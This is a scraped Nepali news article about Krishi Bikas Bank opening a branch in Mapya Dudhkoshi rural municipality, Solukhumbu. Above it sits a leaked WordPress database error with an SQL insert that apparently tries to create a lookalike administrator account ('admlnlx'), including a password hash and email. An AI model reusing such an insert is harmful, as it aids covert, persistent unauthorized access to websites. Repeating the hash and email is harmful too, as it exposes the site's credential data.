WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BsKc65gQrrDB9ZowujeZy7kS.2uZrR1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 22:39:57', '', 'admlnlx', 'admlnlx')

माप्य दुधकोशी गाउपालिकामा कृषी बिकास बैँकले आइतबार देखि सेवा थाल्दै  – Gaule Khabar

माप्य दुधकोशी गाउपालिकामा कृषी बिकास बैँकले आइतबार देखि सेवा थाल्दै 

माप्य दुधकोशी गाउपालिकामा कृषी बिकास बैँकले आइतबार देखि सेवा थाल्दै 

गाउँले  न्युज, ११ माघ, सोलुखुम्बु । माप्य दुधकोशी गाउँपालिकामा कृषी विकास बैँकले सेवा सुरु गरेको छ । गाउँपालिकाको केन्द्र खास्तापमा कृषीले शाखा विस्तार गरेको हो । बैँकले आइतबारबाट वित्तिय कारवार सुरु गर्नेछ । गाउँपालिकाका अध्यक्ष बुद्धिकीरण राईले थोरै समयमा क वर्गको सरकारी बैँक गाउँपालिकामा संचालन गर्नु महत्वपुर्ण सफलता भएको बताउनुभयो । सुम्नीमा खालिङ राई सस्कृती समुहले आयोजना गरेको भलिबल प्रतियोगितामा बोल्नु हुदै अध्यक्षले यस्तो जानकारी गराउनुभएको हो ।

गाउँपालिकाको अनुरोधलाई स्वीकार गरि कृषी विकास बैँकको केन्द्रीय कार्यालयले शाखा संचालन गर्ने जेष्ठमा निर्णय गरेको थियो । त्यस लगत्तै थालिएको तयारीपछि माघको पहिलो साता बैँक शाखाले पुर्णता पाएको हो ।

गाउँपालिकाको सम्पुर्ण वित्तिय कारोवार देखि सर्वसाधारणले समेत गाउँपालिकामै संचालनमा आएको बैँकबाट बैंकिङ कारोवार गर्ने सुविधा पाएका हुन् ।

आइतबार पहिलो दिन खाता खाल्ने र बचत कार्य पनि अघि बढाउने बैँक शाखाका प्रवन्धक महेन्द्र शाहले जानकारी दिनुभयो । आइतबार पहिलो दिन धेरैभन्दा धेरै सर्वसाधरणको खाता खोल्ने बैँकको योजना भएकाले सो दिन सेवाका लागि आउन सर्वसाधारणलाई उहाँले आग्रह गर्नुभयो ।

चल्ती खाता, बचत खाता, बाल खाता, बुवाआमा खाताहरु संचालन गर्ने बैँकले जनाएका् छ । देश भित्र र बाहिर रकम पठाउन तथा झिक्नका लागि समेत रेमिट्यान्सको सुविधा बैँकले दिनेछ ।

अधिकारसिद्ध गाउँपालिका भइसकेपछि गाउँस्तरमै आर्थिक कारोवार समेत बढ्ने र वित्तिय सुविधाका लागि सर्वसाधारणलाई अन्यत्र जान नपरोस भनी बैँकको स्थापना गरिएको गाउँपालिकाकी उपप्रमुख जुनिता मगरले जानकारी दिनुभयो ।

अघिल्लो आर्थिक बर्षमै बैँक संचालन गर्ने भनिए पनि शाखा विस्तारको आश्वासन दिएको प्रभु बैँकले धोका दिएपछि केही ढिलो भएको  गाउँपालिकाले जनाएको छ । अध्यक्ष राईले भन्नुभयो, “सोलुखुम्बुको ७ गाउँपालिका मध्य सवैभन्दा पहिले हामीले बैँक संचालन गर्ने तयारी गरेका थियौँ तर प्रभु बैँकले धोका दियो, केही ढिलो भए पनि हामीले आम जनता, विशेष गरी कृषकको विश्वासीलो बैँकलाई गाउँपालिकामा भित्र्याएका छौँ ।”

गाउँमै बैँक संचालनमा आए पछि स्थानीय पनि खुसी बनेका छन् । स्थानीय व्यवसायी जगबहादुर विकले वित्तिय कारोबारका लागि सदरमकुकाम सल्लेरी सम्म जानु पर्ने बाध्यता टरेको भन्दै खुसी ब्यक्त गर्नुभयो ।

 

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका